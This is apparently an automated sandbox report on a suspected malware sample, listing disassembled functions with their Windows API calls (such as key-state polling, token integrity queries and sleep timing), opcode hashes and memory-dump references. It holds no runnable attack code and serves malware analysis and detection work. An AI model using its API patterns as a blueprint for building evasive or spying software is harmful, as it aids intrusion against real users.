Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 656f56ead559e128f5f83d332c140a414846d7d216f388136aca5a634eb78e18
Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
Opcode Fuzzy Hash: 656f56ead559e128f5f83d332c140a414846d7d216f388136aca5a634eb78e18
Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55

Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A

Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00402357
ScreenToClient.USER32(004C57B0,?), ref: 00402374
GetAsyncKeyState.USER32(00000001), ref: 00402399
GetAsyncKeyState.USER32(00000002), ref: 004023A7

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95

Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
TranslateMessage.USER32(?), ref: 0045645C
DispatchMessageW.USER32(?), ref: 00456466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D

Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00458A30
PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94

Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0045B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
_wcsstr.LIBCMT ref: 0045B289

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 23d17219bcdf7b792c257febb425ecba3a1b4e94db5b9134c94f5bfe8b61d5b8
Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
Opcode Fuzzy Hash: 23d17219bcdf7b792c257febb425ecba3a1b4e94db5b9134c94f5bfe8b61d5b8
Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8

Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetWindowLongW.USER32(?,000000F0), ref: 0048B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
GetSystemMetrics.USER32(00000004), ref: 0048B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98

Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
__itow.LIBCMT ref: 0045936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
__itow.LIBCMT ref: 004593A3

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A

Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
SelectObject.GDI32(?,00000000), ref: 0040135C
BeginPath.GDI32(?), ref: 00401373
SelectObject.GDI32(?,00000000), ref: 0040139C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9

Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00464ABA
__beginthreadex.LIBCMT ref: 00464AD8
MessageBoxW.USER32(?,?,?,?), ref: 00464AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9

Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64

Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4

Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA

Function 0045810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64

Function 0045C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
MessageBeep.USER32(00000000), ref: 0045C226
KillTimer.USER32(?,0000040A), ref: 0045C242
EndDialog.USER32(?,00000001), ref: 0045C25C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59

Function 004013B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004013BF
StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
SelectObject.GDI32(?,00000000), ref: 004013EE
DeleteObject.GDI32 ref: 00401401
StrokePath.GDI32(?), ref: 0040141C

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
